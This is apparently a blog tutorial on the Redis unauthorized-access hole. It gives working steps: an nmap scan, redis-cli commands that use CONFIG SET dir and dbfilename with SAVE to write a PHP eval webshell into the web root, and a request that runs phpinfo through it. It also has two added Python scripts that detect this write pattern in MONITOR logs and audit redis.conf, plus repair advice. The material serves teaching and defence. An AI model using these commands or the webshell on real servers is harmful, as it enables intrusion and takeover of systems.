Web Security: Redis Unauthorized Access Vulnerability Test.

By default, Redis listens on port 6379. If no firewall rule or similar security policy restricts which source IPs may connect, the service is exposed directly to the public network; if, in addition, no password (or only a weak password) is configured, anyone who can reach the port can use Redis without authentication. That combination is the vulnerability.


Table of contents:

Web Security: Redis Unauthorized Access Vulnerability Test.

Harm of Redis unauthorized access vulnerability:

Redis unauthorized access vulnerability test:

Step 1: Use the nmap tool for port scanning.

Step 2: Check if you can connect to Redis and get sensitive information.

Step 3: Utilize the Redis unauthorized vulnerability to upload the program (Trojan horse)

Step 4: Access the uploaded program (Trojan horse)

Step 5: Use the uploaded program (Trojan horse) to connect to the server to gain control.

Redis unauthorized access vulnerability repair method:


Harm of Redis unauthorized access vulnerability:

An attacker can use the data backup (persistence) feature to write a backdoor file to disk.

An attacker can read internal data without any authentication, which may leak sensitive information.

If Redis is running as root, an attacker can write an SSH public key into the root account's authorized_keys file and then log in to the target server directly over SSH.

Redis unauthorized access vulnerability test:

Step 1: Use the nmap tool for port scanning.

nmap <server IP> -p <port to check>

nmap 192.168.0.101 -p 6379            // scan whether port 6379 is open.


Step 2: Check if you can connect to Redis and get sensitive information.

sudo redis-cli -h 192.168.0.101        // connect to the Redis database.

info                                   // view sensitive information (version, OS, paths, ...).


Step 3: Utilize the Redis unauthorized vulnerability to upload the program (Trojan horse)

config set dir /var/www/html        // write a script into the web root /var/www/html.
config set dbfilename bgxg.php        // the script is named bgxg.php.
set webshell "<?php @eval($_POST['bgxg']); ?>"        // the script content is the text between the quotes.
save            // persist the data that was just written.
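The sequence above (CONFIG SET dir, CONFIG SET dbfilename, SAVE) is exactly what a defender should look for in Redis command traffic. The following Python script is an added example, not part of the original post: it parses the output format of `redis-cli MONITOR` and raises an alert when a client repoints persistence to a non-RDB filename or forces a dump after changing dir/dbfilename. The sample MONITOR lines, client addresses and timestamps are constructed for this example, and the webshell payload is omitted.

```python
import re
from collections import defaultdict

# Constructed sample of `redis-cli MONITOR` output; client addresses, timestamps
# and key names are made up for this example (the payload string is omitted).
SAMPLE_MONITOR = """\
1700000000.100000 [0 192.168.0.50:51000] "config" "set" "dir" "/var/www/html"
1700000000.200000 [0 192.168.0.50:51000] "config" "set" "dbfilename" "bgxg.php"
1700000000.300000 [0 192.168.0.50:51000] "set" "webshell" "<payload omitted>"
1700000000.400000 [0 192.168.0.50:51000] "save"
1700000001.000000 [0 10.0.0.7:40000] "get" "session:abc"
1700000002.000000 [0 10.0.0.7:40000] "config" "set" "maxmemory" "256mb"
1700000003.000000 [0 10.0.0.7:40000] "bgsave"
"""

# One MONITOR line looks like: <unix ts> [<db> <client addr>] "<arg>" "<arg>" ...
LINE_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

RDB_SUFFIX = ".rdb"                    # a legitimate dump file keeps this extension
REDIRECT_KEYS = {"dir", "dbfilename"}  # the two settings that decide where SAVE writes


def parse_monitor_line(line):
    """Return {'ts', 'client', 'args'} for one MONITOR line, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    args = [a.replace('\\"', '"').replace("\\\\", "\\") for a in ARG_RE.findall(m.group("args"))]
    return {"ts": float(m.group("ts")), "client": m.group("client"), "args": args}


def detect_rdb_write_abuse(lines):
    """Flag clients that repoint persistence (CONFIG SET dir/dbfilename) and then force a dump."""
    redirected = defaultdict(dict)  # client -> {"dir": ..., "dbfilename": ...}
    alerts = []
    for line in lines:
        ev = parse_monitor_line(line)
        if not ev or not ev["args"]:
            continue
        args, client = ev["args"], ev["client"]
        cmd = args[0].lower()
        if (cmd == "config" and len(args) >= 4 and args[1].lower() == "set"
                and args[2].lower() in REDIRECT_KEYS):
            key, value = args[2].lower(), args[3]
            redirected[client][key] = value
            # A dump file that is not an .rdb is almost never a backup.
            if key == "dbfilename" and not value.lower().endswith(RDB_SUFFIX):
                alerts.append({"ts": ev["ts"], "client": client, "rule": "dbfilename-not-rdb",
                               "detail": f"dbfilename set to {value!r}"})
        elif cmd in ("save", "bgsave") and redirected.get(client):
            r = redirected[client]
            target = f"{r.get('dir', '<unchanged dir>')}/{r.get('dbfilename', '<unchanged dbfilename>')}"
            alerts.append({"ts": ev["ts"], "client": client, "rule": "save-after-redirect",
                           "detail": f"{args[0].upper()} will write RDB data to {target}"})
    return alerts


if __name__ == "__main__":
    for alert in detect_rdb_write_abuse(SAMPLE_MONITOR.splitlines()):
        print(alert)
```

The state is tracked per client address so that an administrator's unrelated CONFIG SET (the `maxmemory` line) followed by BGSAVE does not fire; only the client that changed dir or dbfilename and then saved is reported. In production the same logic can be fed from a MONITOR stream or from a proxy's command log.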


Step 4: Access the uploaded program (Trojan horse)

http://192.168.0.101/bgxg.php        // bgxg.php is the file that was just written.

bgxg=phpinfo();                      // phpinfo(); displays the server's information.


Step 5: Use the uploaded program (Trojan horse) to connect to the server to gain control.


Redis unauthorized access vulnerability repair method:

(1) Add password authentication to Redis.

(2) Block access to the Redis port from the external network.

(3) Change the default Redis service port.
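To check whether a deployment actually applies the three fixes above, here is an added example (not from the original post) in Python: a small redis.conf auditor that reports a missing or short `requirepass`, a `bind` on a wildcard address (or no `bind` at all, which makes Redis listen on every interface), `protected-mode no`, and the default port. The two configuration fragments are constructed for the example, the placeholder password must be replaced with a real random secret, and the 16-character minimum is a threshold chosen here, not a Redis default.

```python
import shlex

# Two constructed redis.conf fragments (not from any real deployment): an
# exposed default-style install, and one that applies the fixes listed above.
WEAK_CONF = """\
# constructed: exposed default-style configuration
port 6379
bind 0.0.0.0
protected-mode no
"""

HARDENED_CONF = """\
# constructed: hardened configuration
port 16379
bind 127.0.0.1 -::1
protected-mode yes
requirepass "REPLACE-WITH-A-LONG-RANDOM-SECRET"
"""

MIN_PASSWORD_LEN = 16                 # example threshold, not a Redis default
WILDCARD_BIND = {"0.0.0.0", "*", "::"}  # addresses that expose Redis on every interface


def parse_redis_conf(text):
    """Map each directive (lower-cased) to the list of argument lists seen for it.

    Redis only treats whole lines starting with '#' as comments, so inline '#'
    (e.g. inside a password) is kept.
    """
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_redis_conf(text):
    """Return (severity, directive, message) tuples for the exposures the post describes."""
    conf = parse_redis_conf(text)
    findings = []

    # (1) password authentication; the last occurrence of a directive wins in Redis
    pw = conf.get("requirepass", [[]])[-1]
    if not pw or not pw[0]:
        findings.append(("high", "requirepass",
                         "no password: anyone who can reach the port is authenticated"))
    elif len(pw[0]) < MIN_PASSWORD_LEN:
        findings.append(("high", "requirepass",
                         f"password shorter than {MIN_PASSWORD_LEN} characters"))

    # (2) reachability from the outside; a leading '-' marks an optional bind address
    if "bind" not in conf:
        findings.append(("high", "bind", "no bind directive: Redis listens on every interface"))
    else:
        addrs = {a.lstrip("-") for a in conf["bind"][-1]}
        if addrs & WILDCARD_BIND:
            findings.append(("high", "bind",
                             f"bound to a wildcard address: {sorted(addrs & WILDCARD_BIND)}"))

    if conf.get("protected-mode", [["yes"]])[-1][:1] == ["no"]:
        findings.append(("high", "protected-mode",
                         "protected-mode disabled: an unbound, passwordless instance accepts remote clients"))

    # (3) default port; low severity because it only slows down discovery
    if conf.get("port", [["6379"]])[-1][:1] == ["6379"]:
        findings.append(("low", "port", "default port 6379: trivially found by a port scan"))

    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(text))
```

Run it against the real `/etc/redis/redis.conf` by passing the file's contents to `audit_redis_conf`. Changing the port (3) is the weakest of the three measures, which is why it is reported as low severity; the password and the bind/firewall restriction are what actually close the vulnerability.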


Origin blog.csdn.net/weixin_54977781/article/details/130900745